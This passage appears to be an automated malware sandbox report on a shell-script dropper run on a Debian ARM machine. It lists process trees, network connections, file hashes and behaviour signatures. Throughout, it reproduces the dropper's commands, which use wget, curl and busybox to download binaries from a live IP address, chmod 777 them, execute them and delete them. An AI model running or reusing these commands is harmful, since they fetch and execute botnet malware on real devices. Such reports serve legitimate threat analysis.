[curl -O http://216.126.231.240/bins/gHsWLXEAA34Ok0m6RB99GRwbvdLPVt3RRE]

/bin/busybox

[/bin/busybox wget http://216.126.231.240/bins/gHsWLXEAA34Ok0m6RB99GRwbvdLPVt3RRE]

/bin/chmod

[chmod 777 gHsWLXEAA34Ok0m6RB99GRwbvdLPVt3RRE]

/tmp/gHsWLXEAA34Ok0m6RB99GRwbvdLPVt3RRE

[./gHsWLXEAA34Ok0m6RB99GRwbvdLPVt3RRE]

/bin/rm

[rm gHsWLXEAA34Ok0m6RB99GRwbvdLPVt3RRE]

/usr/bin/wget

[wget http://216.126.231.240/bins/Lb6CShTHfvUiN9iIlGR4ASGFieLIEoyxYD]

/usr/bin/curl

[curl -O http://216.126.231.240/bins/Lb6CShTHfvUiN9iIlGR4ASGFieLIEoyxYD]

/bin/busybox

[/bin/busybox wget http://216.126.231.240/bins/Lb6CShTHfvUiN9iIlGR4ASGFieLIEoyxYD]

/bin/chmod

[chmod 777 Lb6CShTHfvUiN9iIlGR4ASGFieLIEoyxYD]

/tmp/Lb6CShTHfvUiN9iIlGR4ASGFieLIEoyxYD

[./Lb6CShTHfvUiN9iIlGR4ASGFieLIEoyxYD]

/bin/rm

[rm Lb6CShTHfvUiN9iIlGR4ASGFieLIEoyxYD]

/usr/bin/wget

[wget http://216.126.231.240/bins/eTDcY1w3gh5aYO6tO1N4qaN0q6piUltk65]

/usr/bin/curl

[curl -O http://216.126.231.240/bins/eTDcY1w3gh5aYO6tO1N4qaN0q6piUltk65]

/bin/busybox

[/bin/busybox wget http://216.126.231.240/bins/eTDcY1w3gh5aYO6tO1N4qaN0q6piUltk65]

/bin/chmod

[chmod 777 eTDcY1w3gh5aYO6tO1N4qaN0q6piUltk65]

/tmp/eTDcY1w3gh5aYO6tO1N4qaN0q6piUltk65

[./eTDcY1w3gh5aYO6tO1N4qaN0q6piUltk65]

/bin/rm

[rm eTDcY1w3gh5aYO6tO1N4qaN0q6piUltk65]

/usr/bin/wget

[wget http://216.126.231.240/bins/FMQG8KSSJRTjzEZTSXIdND9PZvy2X7LIuj]

/usr/bin/curl

[curl -O http://216.126.231.240/bins/FMQG8KSSJRTjzEZTSXIdND9PZvy2X7LIuj]

/bin/busybox

[/bin/busybox wget http://216.126.231.240/bins/FMQG8KSSJRTjzEZTSXIdND9PZvy2X7LIuj]

/bin/chmod

[chmod 777 FMQG8KSSJRTjzEZTSXIdND9PZvy2X7LIuj]

/tmp/FMQG8KSSJRTjzEZTSXIdND9PZvy2X7LIuj

[./FMQG8KSSJRTjzEZTSXIdND9PZvy2X7LIuj]

/bin/rm

[rm FMQG8KSSJRTjzEZTSXIdND9PZvy2X7LIuj]

/usr/bin/wget

[wget http://216.126.231.240/bins/MPXq0ebQtlVnIjDNWv7vGTg3PpH5RCViZs]

/usr/bin/curl

[curl -O http://216.126.231.240/bins/MPXq0ebQtlVnIjDNWv7vGTg3PpH5RCViZs]

/bin/busybox

[/bin/busybox wget http://216.126.231.240/bins/MPXq0ebQtlVnIjDNWv7vGTg3PpH5RCViZs]

/bin/chmod

[chmod 777 MPXq0ebQtlVnIjDNWv7vGTg3PpH5RCViZs]

/tmp/MPXq0ebQtlVnIjDNWv7vGTg3PpH5RCViZs

[./MPXq0ebQtlVnIjDNWv7vGTg3PpH5RCViZs]

/bin/rm

[rm MPXq0ebQtlVnIjDNWv7vGTg3PpH5RCViZs]

/usr/bin/wget

[wget http://216.126.231.240/bins/pyNBSkRl67RcfcHuSL0zBq1WP0GOObmUpv]

/usr/bin/curl

[curl -O http://216.126.231.240/bins/pyNBSkRl67RcfcHuSL0zBq1WP0GOObmUpv]

/bin/busybox

[/bin/busybox wget http://216.126.231.240/bins/pyNBSkRl67RcfcHuSL0zBq1WP0GOObmUpv]

/bin/chmod

[chmod 777 pyNBSkRl67RcfcHuSL0zBq1WP0GOObmUpv]

/tmp/pyNBSkRl67RcfcHuSL0zBq1WP0GOObmUpv

[./pyNBSkRl67RcfcHuSL0zBq1WP0GOObmUpv]

/bin/rm

[rm pyNBSkRl67RcfcHuSL0zBq1WP0GOObmUpv]

/usr/bin/wget

[wget http://216.126.231.240/bins/IVT3Iyip9vCH9TjS002jTfa2DzOAfcSpEa]

/usr/bin/curl

[curl -O http://216.126.231.240/bins/IVT3Iyip9vCH9TjS002jTfa2DzOAfcSpEa]

/bin/busybox

[/bin/busybox wget http://216.126.231.240/bins/IVT3Iyip9vCH9TjS002jTfa2DzOAfcSpEa]

/bin/chmod

[chmod 777 IVT3Iyip9vCH9TjS002jTfa2DzOAfcSpEa]

/tmp/IVT3Iyip9vCH9TjS002jTfa2DzOAfcSpEa

[./IVT3Iyip9vCH9TjS002jTfa2DzOAfcSpEa]

/bin/rm

[rm IVT3Iyip9vCH9TjS002jTfa2DzOAfcSpEa]

/usr/bin/wget

[wget http://216.126.231.240/bins/L1g2hIoTYQqUPu8zxlXMujq6BQ0aGj4PfW]

/usr/bin/curl

[curl -O http://216.126.231.240/bins/L1g2hIoTYQqUPu8zxlXMujq6BQ0aGj4PfW]

/bin/busybox

[/bin/busybox wget http://216.126.231.240/bins/L1g2hIoTYQqUPu8zxlXMujq6BQ0aGj4PfW]

/bin/chmod

[chmod 777 L1g2hIoTYQqUPu8zxlXMujq6BQ0aGj4PfW]

/tmp/L1g2hIoTYQqUPu8zxlXMujq6BQ0aGj4PfW

[./L1g2hIoTYQqUPu8zxlXMujq6BQ0aGj4PfW]

/bin/rm

[rm L1g2hIoTYQqUPu8zxlXMujq6BQ0aGj4PfW]

/usr/bin/wget

[wget http://216.126.231.240/bins/FMQG8KSSJRTjzEZTSXIdND9PZvy2X7LIuj]

/usr/bin/curl

[curl -O http://216.126.231.240/bins/FMQG8KSSJRTjzEZTSXIdND9PZvy2X7LIuj]

/bin/busybox

[/bin/busybox wget http://216.126.231.240/bins/FMQG8KSSJRTjzEZTSXIdND9PZvy2X7LIuj]

/bin/chmod

[chmod 777 FMQG8KSSJRTjzEZTSXIdND9PZvy2X7LIuj]

/tmp/FMQG8KSSJRTjzEZTSXIdND9PZvy2X7LIuj

[./FMQG8KSSJRTjzEZTSXIdND9PZvy2X7LIuj]

/bin/rm

[rm FMQG8KSSJRTjzEZTSXIdND9PZvy2X7LIuj]

/usr/bin/wget

[wget http://216.126.231.240/bins/MPXq0ebQtlVnIjDNWv7vGTg3PpH5RCViZs]

/usr/bin/curl

[curl -O http://216.126.231.240/bins/MPXq0ebQtlVnIjDNWv7vGTg3PpH5RCViZs]

/bin/busybox

[/bin/busybox wget http://216.126.231.240/bins/MPXq0ebQtlVnIjDNWv7vGTg3PpH5RCViZs]

/bin/chmod

[chmod 777 MPXq0ebQtlVnIjDNWv7vGTg3PpH5RCViZs]

/tmp/MPXq0ebQtlVnIjDNWv7vGTg3PpH5RCViZs

[./MPXq0ebQtlVnIjDNWv7vGTg3PpH5RCViZs]

/bin/rm

[rm MPXq0ebQtlVnIjDNWv7vGTg3PpH5RCViZs]

/usr/bin/wget

[wget http://216.126.231.240/bins/gHsWLXEAA34Ok0m6RB99GRwbvdLPVt3RRE]

/usr/bin/curl

[curl -O http://216.126.231.240/bins/gHsWLXEAA34Ok0m6RB99GRwbvdLPVt3RRE]

/bin/busybox

[/bin/busybox wget http://216.126.231.240/bins/gHsWLXEAA34Ok0m6RB99GRwbvdLPVt3RRE]

/bin/chmod

[chmod 777 gHsWLXEAA34Ok0m6RB99GRwbvdLPVt3RRE]

/tmp/gHsWLXEAA34Ok0m6RB99GRwbvdLPVt3RRE

[./gHsWLXEAA34Ok0m6RB99GRwbvdLPVt3RRE]

/bin/rm

[rm gHsWLXEAA34Ok0m6RB99GRwbvdLPVt3RRE]

/usr/bin/wget

[wget http://216.126.231.240/bins/Lb6CShTHfvUiN9iIlGR4ASGFieLIEoyxYD]

/usr/bin/curl

[curl -O http://216.126.231.240/bins/Lb6CShTHfvUiN9iIlGR4ASGFieLIEoyxYD]

/bin/busybox

[/bin/busybox wget http://216.126.231.240/bins/Lb6CShTHfvUiN9iIlGR4ASGFieLIEoyxYD]

/bin/chmod

[chmod 777 Lb6CShTHfvUiN9iIlGR4ASGFieLIEoyxYD]

/tmp/Lb6CShTHfvUiN9iIlGR4ASGFieLIEoyxYD

[./Lb6CShTHfvUiN9iIlGR4ASGFieLIEoyxYD]

/bin/rm

[rm Lb6CShTHfvUiN9iIlGR4ASGFieLIEoyxYD]

/usr/bin/wget

[wget http://216.126.231.240/bins/eTDcY1w3gh5aYO6tO1N4qaN0q6piUltk65]

/usr/bin/curl

[curl -O http://216.126.231.240/bins/eTDcY1w3gh5aYO6tO1N4qaN0q6piUltk65]

/bin/busybox

[/bin/busybox wget http://216.126.231.240/bins/eTDcY1w3gh5aYO6tO1N4qaN0q6piUltk65]

/bin/chmod

[chmod 777 eTDcY1w3gh5aYO6tO1N4qaN0q6piUltk65]

/tmp/eTDcY1w3gh5aYO6tO1N4qaN0q6piUltk65

[./eTDcY1w3gh5aYO6tO1N4qaN0q6piUltk65]

/bin/rm

[rm eTDcY1w3gh5aYO6tO1N4qaN0q6piUltk65]

/usr/bin/wget

[wget http://216.126.231.240/bins/C5Hu61pxoms8k2hlFr4x40NbgSkOxMkUzR]

/usr/bin/curl

[curl -O http://216.126.231.240/bins/C5Hu61pxoms8k2hlFr4x40NbgSkOxMkUzR]

/bin/busybox

[/bin/busybox wget http://216.126.231.240/bins/C5Hu61pxoms8k2hlFr4x40NbgSkOxMkUzR]

/bin/chmod

[chmod 777 C5Hu61pxoms8k2hlFr4x40NbgSkOxMkUzR]

/tmp/C5Hu61pxoms8k2hlFr4x40NbgSkOxMkUzR

[./C5Hu61pxoms8k2hlFr4x40NbgSkOxMkUzR]

/bin/rm

[rm C5Hu61pxoms8k2hlFr4x40NbgSkOxMkUzR]

/usr/bin/wget

[wget http://216.126.231.240/bins/jIiunTS73FUsOxnh4HOape1YcBamnSW5H4]

/usr/bin/curl

[curl -O http://216.126.231.240/bins/jIiunTS73FUsOxnh4HOape1YcBamnSW5H4]

/bin/busybox

[/bin/busybox wget http://216.126.231.240/bins/jIiunTS73FUsOxnh4HOape1YcBamnSW5H4]

/bin/chmod

[chmod 777 jIiunTS73FUsOxnh4HOape1YcBamnSW5H4]

/tmp/jIiunTS73FUsOxnh4HOape1YcBamnSW5H4

[./jIiunTS73FUsOxnh4HOape1YcBamnSW5H4]

/bin/rm

[rm jIiunTS73FUsOxnh4HOape1YcBamnSW5H4]

/usr/bin/wget

[wget http://216.126.231.240/bins/No9wx7oCydXhyIHee1rFBAITRECLsnUBZ5]

/usr/bin/curl

[curl -O http://216.126.231.240/bins/No9wx7oCydXhyIHee1rFBAITRECLsnUBZ5]

/bin/busybox

[/bin/busybox wget http://216.126.231.240/bins/No9wx7oCydXhyIHee1rFBAITRECLsnUBZ5]

/bin/chmod

[chmod 777 No9wx7oCydXhyIHee1rFBAITRECLsnUBZ5]

/tmp/No9wx7oCydXhyIHee1rFBAITRECLsnUBZ5

[./No9wx7oCydXhyIHee1rFBAITRECLsnUBZ5]

/bin/rm

[rm No9wx7oCydXhyIHee1rFBAITRECLsnUBZ5]

/usr/bin/wget

[wget http://216.126.231.240/bins/nKoSFIFR6APO75G687YBztazTOwWyWEgGY]

/usr/bin/curl

[curl -O http://216.126.231.240/bins/nKoSFIFR6APO75G687YBztazTOwWyWEgGY]

/bin/busybox

[/bin/busybox wget http://216.126.231.240/bins/nKoSFIFR6APO75G687YBztazTOwWyWEgGY]

/bin/chmod

[chmod 777 nKoSFIFR6APO75G687YBztazTOwWyWEgGY]

/tmp/nKoSFIFR6APO75G687YBztazTOwWyWEgGY

[./nKoSFIFR6APO75G687YBztazTOwWyWEgGY]

/bin/rm

[rm nKoSFIFR6APO75G687YBztazTOwWyWEgGY]

/usr/bin/wget

[wget http://216.126.231.240/bins/7p68azu0EFmSJ4IRPQvG5PC3kG43rlK10W]

/usr/bin/curl

[curl -O http://216.126.231.240/bins/7p68azu0EFmSJ4IRPQvG5PC3kG43rlK10W]

/bin/busybox

[/bin/busybox wget http://216.126.231.240/bins/7p68azu0EFmSJ4IRPQvG5PC3kG43rlK10W]

/bin/chmod

[chmod 777 7p68azu0EFmSJ4IRPQvG5PC3kG43rlK10W]

/tmp/7p68azu0EFmSJ4IRPQvG5PC3kG43rlK10W

[./7p68azu0EFmSJ4IRPQvG5PC3kG43rlK10W]

/bin/rm

[rm 7p68azu0EFmSJ4IRPQvG5PC3kG43rlK10W]

/usr/bin/wget

[wget http://216.126.231.240/bins/6AvuerelT2eWDA5qUF5FCM4oUIlTVMqzQ1]

/usr/bin/curl

[curl -O http://216.126.231.240/bins/6AvuerelT2eWDA5qUF5FCM4oUIlTVMqzQ1]

/bin/busybox

[/bin/busybox wget http://216.126.231.240/bins/6AvuerelT2eWDA5qUF5FCM4oUIlTVMqzQ1]

/bin/chmod

[chmod 777 6AvuerelT2eWDA5qUF5FCM4oUIlTVMqzQ1]

/tmp/6AvuerelT2eWDA5qUF5FCM4oUIlTVMqzQ1

[./6AvuerelT2eWDA5qUF5FCM4oUIlTVMqzQ1]

/bin/rm

[rm 6AvuerelT2eWDA5qUF5FCM4oUIlTVMqzQ1]

Network

Country Destination Domain Proto
US 216.126.231.240:80 216.126.231.240 tcp
N/A 224.0.0.251:5353 udp
US 151.101.193.91:443 tcp
GB 195.181.164.14:443 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
GB 185.125.188.62:443 tcp
GB 185.125.188.62:443 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp

Files

/tmp/C5Hu61pxoms8k2hlFr4x40NbgSkOxMkUzR

MD5 998368d7c95ea4293237f2320546e440
SHA1 30dfd2d3bb8a7e3241bd7792e90a98ebb70be3a4
SHA256 533a1ca5d6595793725bca7641d9461a0f00dd1732dded3e4281196f5dd21736
SHA512 648c4720a85dbf834be1ba00f0e1b4167cc670fe15896efb00a77fb6e0c225a13aae3da10d85fa6e7f726420d9bb3c20c43466e02296d44153c127b7160e0b97

Analysis: behavioral2

Detonation Overview

Submitted

2024-11-14 01:33

Reported

2024-11-14 01:36

Platform

debian9-armhf-20240418-en

Max time kernel

18s

Max time network

19s

Command Line

[/tmp/4aa5ab11bd6f613478208b74ffefcd67594912de8b15bc52edf572a0367d01e0.sh]

Signatures

File and Directory Permissions Modification

defense_evasion
Description Indicator Process Target
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A

Executes dropped EXE

Description Indicator Process Target
N/A /tmp/C5Hu61pxoms8k2hlFr4x40NbgSkOxMkUzR /tmp/C5Hu61pxoms8k2hlFr4x40NbgSkOxMkUzR N/A
N/A /tmp/jIiunTS73FUsOxnh4HOape1YcBamnSW5H4 /tmp/jIiunTS73FUsOxnh4HOape1YcBamnSW5H4 N/A
N/A /tmp/No9wx7oCydXhyIHee1rFBAITRECLsnUBZ5 /tmp/No9wx7oCydXhyIHee1rFBAITRECLsnUBZ5 N/A
N/A /tmp/nKoSFIFR6APO75G687YBztazTOwWyWEgGY /tmp/nKoSFIFR6APO75G687YBztazTOwWyWEgGY N/A
N/A /tmp/7p68azu0EFmSJ4IRPQvG5PC3kG43rlK10W /tmp/7p68azu0EFmSJ4IRPQvG5PC3kG43rlK10W N/A
N/A /tmp/6AvuerelT2eWDA5qUF5FCM4oUIlTVMqzQ1 /tmp/6AvuerelT2eWDA5qUF5FCM4oUIlTVMqzQ1 N/A
N/A /tmp/pyNBSkRl67RcfcHuSL0zBq1WP0GOObmUpv /tmp/pyNBSkRl67RcfcHuSL0zBq1WP0GOObmUpv N/A
N/A /tmp/IVT3Iyip9vCH9TjS002jTfa2DzOAfcSpEa /tmp/IVT3Iyip9vCH9TjS002jTfa2DzOAfcSpEa N/A
N/A /tmp/L1g2hIoTYQqUPu8zxlXMujq6BQ0aGj4PfW /tmp/L1g2hIoTYQqUPu8zxlXMujq6BQ0aGj4PfW N/A

Checks CPU configuration

antivm
Description Indicator Process Target
File opened for reading /proc/cpuinfo /usr/bin/curl N/A
File opened for reading /proc/cpuinfo /usr/bin/curl N/A
File opened for reading /proc/cpuinfo /usr/bin/curl N/A
File opened for reading /proc/cpuinfo /usr/bin/curl N/A
File opened for reading /proc/cpuinfo /usr/bin/curl N/A
File opened for reading /proc/cpuinfo /usr/bin/curl N/A
File opened for reading /proc/cpuinfo /usr/bin/curl N/A
File opened for reading /proc/cpuinfo /usr/bin/curl N/A
File opened for reading /proc/cpuinfo /usr/bin/curl N/A

Reads runtime system information

discovery
Description Indicator Process Target
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/self/auxv /usr/bin/curl N/A
File opened for reading /proc/self/auxv /usr/bin/curl N/A
File opened for reading /proc/self/auxv /usr/bin/curl N/A
File opened for reading /proc/self/auxv /usr/bin/curl N/A
File opened for reading /proc/self/auxv /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/self/auxv /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/self/auxv /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/self/auxv /usr/bin/curl N/A
File opened for reading /proc/self/auxv /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A

System Network Configuration Discovery

discovery
Description Indicator Process Target
N/A N/A /usr/bin/wget N/A
N/A N/A /usr/bin/curl N/A
N/A N/A /bin/busybox N/A
N/A N/A /tmp/IVT3Iyip9vCH9TjS002jTfa2DzOAfcSpEa N/A
N/A N/A /bin/rm N/A

Writes file to tmp directory

Description Indicator Process Target
File opened for modification /tmp/C5Hu61pxoms8k2hlFr4x40NbgSkOxMkUzR /usr/bin/curl N/A
File opened for modification /tmp/6AvuerelT2eWDA5qUF5FCM4oUIlTVMqzQ1 /usr/bin/curl N/A
File opened for modification /tmp/jIiunTS73FUsOxnh4HOape1YcBamnSW5H4 /usr/bin/curl N/A
File opened for modification /tmp/No9wx7oCydXhyIHee1rFBAITRECLsnUBZ5 /usr/bin/curl N/A
File opened for modification /tmp/nKoSFIFR6APO75G687YBztazTOwWyWEgGY /usr/bin/curl N/A
File opened for modification /tmp/7p68azu0EFmSJ4IRPQvG5PC3kG43rlK10W /usr/bin/curl N/A
File opened for modification /tmp/pyNBSkRl67RcfcHuSL0zBq1WP0GOObmUpv /usr/bin/curl N/A
File opened for modification /tmp/IVT3Iyip9vCH9TjS002jTfa2DzOAfcSpEa /usr/bin/curl N/A
File opened for modification /tmp/L1g2hIoTYQqUPu8zxlXMujq6BQ0aGj4PfW /usr/bin/curl N/A

Processes

/tmp/4aa5ab11bd6f613478208b74ffefcd67594912de8b15bc52edf572a0367d01e0.sh

[/tmp/4aa5ab11bd6f613478208b74ffefcd67594912de8b15bc52edf572a0367d01e0.sh]

/bin/rm

[/bin/rm bins.sh]

/usr/bin/wget

[wget http://216.126.231.240/bins/C5Hu61pxoms8k2hlFr4x40NbgSkOxMkUzR]

/usr/bin/curl

[curl -O http://216.126.231.240/bins/C5Hu61pxoms8k2hlFr4x40NbgSkOxMkUzR]

/bin/busybox

[/bin/busybox wget http://216.126.231.240/bins/C5Hu61pxoms8k2hlFr4x40NbgSkOxMkUzR]

/bin/chmod

[chmod 777 C5Hu61pxoms8k2hlFr4x40NbgSkOxMkUzR]

/tmp/C5Hu61pxoms8k2hlFr4x40NbgSkOxMkUzR

[./C5Hu61pxoms8k2hlFr4x40NbgSkOxMkUzR]

/bin/rm

[rm C5Hu61pxoms8k2hlFr4x40NbgSkOxMkUzR]

/usr/bin/wget

[wget http://216.126.231.240/bins/jIiunTS73FUsOxnh4HOape1YcBamnSW5H4]

/usr/bin/curl

[curl -O http://216.126.231.240/bins/jIiunTS73FUsOxnh4HOape1YcBamnSW5H4]

/bin/busybox

[/bin/busybox wget http://216.126.231.240/bins/jIiunTS73FUsOxnh4HOape1YcBamnSW5H4]

/bin/chmod

[chmod 777 jIiunTS73FUsOxnh4HOape1YcBamnSW5H4]

/tmp/jIiunTS73FUsOxnh4HOape1YcBamnSW5H4

[./jIiunTS73FUsOxnh4HOape1YcBamnSW5H4]

/bin/rm

[rm jIiunTS73FUsOxnh4HOape1YcBamnSW5H4]

/usr/bin/wget

[wget http://216.126.231.240/bins/No9wx7oCydXhyIHee1rFBAITRECLsnUBZ5]

/usr/bin/curl

[curl -O http://216.126.231.240/bins/No9wx7oCydXhyIHee1rFBAITRECLsnUBZ5]

/bin/busybox

[/bin/busybox wget http://216.126.231.240/bins/No9wx7oCydXhyIHee1rFBAITRECLsnUBZ5]

/bin/chmod

[chmod 777 No9wx7oCydXhyIHee1rFBAITRECLsnUBZ5]

/tmp/No9wx7oCydXhyIHee1rFBAITRECLsnUBZ5

[./No9wx7oCydXhyIHee1rFBAITRECLsnUBZ5]

/bin/rm

[rm No9wx7oCydXhyIHee1rFBAITRECLsnUBZ5]

/usr/bin/wget

[wget http://216.126.231.240/bins/nKoSFIFR6APO75G687YBztazTOwWyWEgGY]

/usr/bin/curl

[curl -O http://216.126.231.240/bins/nKoSFIFR6APO75G687YBztazTOwWyWEgGY]

/bin/busybox

[/bin/busybox wget http://216.126.231.240/bins/nKoSFIFR6APO75G687YBztazTOwWyWEgGY]

/bin/chmod

[chmod 777 nKoSFIFR6APO75G687YBztazTOwWyWEgGY]

/tmp/nKoSFIFR6APO75G687YBztazTOwWyWEgGY

[./nKoSFIFR6APO75G687YBztazTOwWyWEgGY]

/bin/rm

[rm nKoSFIFR6APO75G687YBztazTOwWyWEgGY]

/usr/bin/wget

[wget http://216.126.231.240/bins/7p68azu0EFmSJ4IRPQvG5PC3kG43rlK10W]

/usr/bin/curl

[curl -O http://216.126.231.240/bins/7p68azu0EFmSJ4IRPQvG5PC3kG43rlK10W]

/bin/busybox

[/bin/busybox wget http://216.126.231.240/bins/7p68azu0EFmSJ4IRPQvG5PC3kG43rlK10W]

/bin/chmod

[chmod 777 7p68azu0EFmSJ4IRPQvG5PC3kG43rlK10W]

/tmp/7p68azu0EFmSJ4IRPQvG5PC3kG43rlK10W

[./7p68azu0EFmSJ4IRPQvG5PC3kG43rlK10W]

/bin/rm

[rm 7p68azu0EFmSJ4IRPQvG5PC3kG43rlK10W]

/usr/bin/wget

[wget http://216.126.231.240/bins/6AvuerelT2eWDA5qUF5FCM4oUIlTVMqzQ1]

/usr/bin/curl

[curl -O http://216.126.231.240/bins/6AvuerelT2eWDA5qUF5FCM4oUIlTVMqzQ1]

/bin/busybox

[/bin/busybox wget http://216.126.231.240/bins/6AvuerelT2eWDA5qUF5FCM4oUIlTVMqzQ1]

/bin/chmod

[chmod 777 6AvuerelT2eWDA5qUF5FCM4oUIlTVMqzQ1]

/tmp/6AvuerelT2eWDA5qUF5FCM4oUIlTVMqzQ1

[./6AvuerelT2eWDA5qUF5FCM4oUIlTVMqzQ1]

/bin/rm

[rm 6AvuerelT2eWDA5qUF5FCM4oUIlTVMqzQ1]

/usr/bin/wget

[wget http://216.126.231.240/bins/pyNBSkRl67RcfcHuSL0zBq1WP0GOObmUpv]

/usr/bin/curl

[curl -O http://216.126.231.240/bins/pyNBSkRl67RcfcHuSL0zBq1WP0GOObmUpv]

/bin/busybox

[/bin/busybox wget http://216.126.231.240/bins/pyNBSkRl67RcfcHuSL0zBq1WP0GOObmUpv]

/bin/chmod

[chmod 777 pyNBSkRl67RcfcHuSL0zBq1WP0GOObmUpv]

/tmp/pyNBSkRl67RcfcHuSL0zBq1WP0GOObmUpv

[./pyNBSkRl67RcfcHuSL0zBq1WP0GOObmUpv]

/bin/rm

[rm pyNBSkRl67RcfcHuSL0zBq1WP0GOObmUpv]

/usr/bin/wget

[wget http://216.126.231.240/bins/IVT3Iyip9vCH9TjS002jTfa2DzOAfcSpEa]

/usr/bin/curl

[curl -O http://216.126.231.240/bins/IVT3Iyip9vCH9TjS002jTfa2DzOAfcSpEa]

/bin/busybox

[/bin/busybox wget http://216.126.231.240/bins/IVT3Iyip9vCH9TjS002jTfa2DzOAfcSpEa]

/bin/chmod

[chmod 777 IVT3Iyip9vCH9TjS002jTfa2DzOAfcSpEa]

/tmp/IVT3Iyip9vCH9TjS002jTfa2DzOAfcSpEa

[./IVT3Iyip9vCH9TjS002jTfa2DzOAfcSpEa]

/bin/rm

[rm IVT3Iyip9vCH9TjS002jTfa2DzOAfcSpEa]

/usr/bin/wget

[wget http://216.126.231.240/bins/L1g2hIoTYQqUPu8zxlXMujq6BQ0aGj4PfW]

/usr/bin/curl

[curl -O http://216.126.231.240/bins/L1g2hIoTYQqUPu8zxlXMujq6BQ0aGj4PfW]

/bin/busybox

[/bin/busybox wget http://216.126.231.240/bins/L1g2hIoTYQqUPu8zxlXMujq6BQ0aGj4PfW]

/bin/chmod

[chmod 777 L1g2hIoTYQqUPu8zxlXMujq6BQ0aGj4PfW]

/tmp/L1g2hIoTYQqUPu8zxlXMujq6BQ0aGj4PfW

[./L1g2hIoTYQqUPu8zxlXMujq6BQ0aGj4PfW]

/bin/rm

[rm L1g2hIoTYQqUPu8zxlXMujq6BQ0aGj4PfW]

/usr/bin/wget

[wget http://216.126.231.240/bins/gHsWLXEAA34Ok0m6RB99GRwbvdLPVt3RRE]

/usr/bin/curl

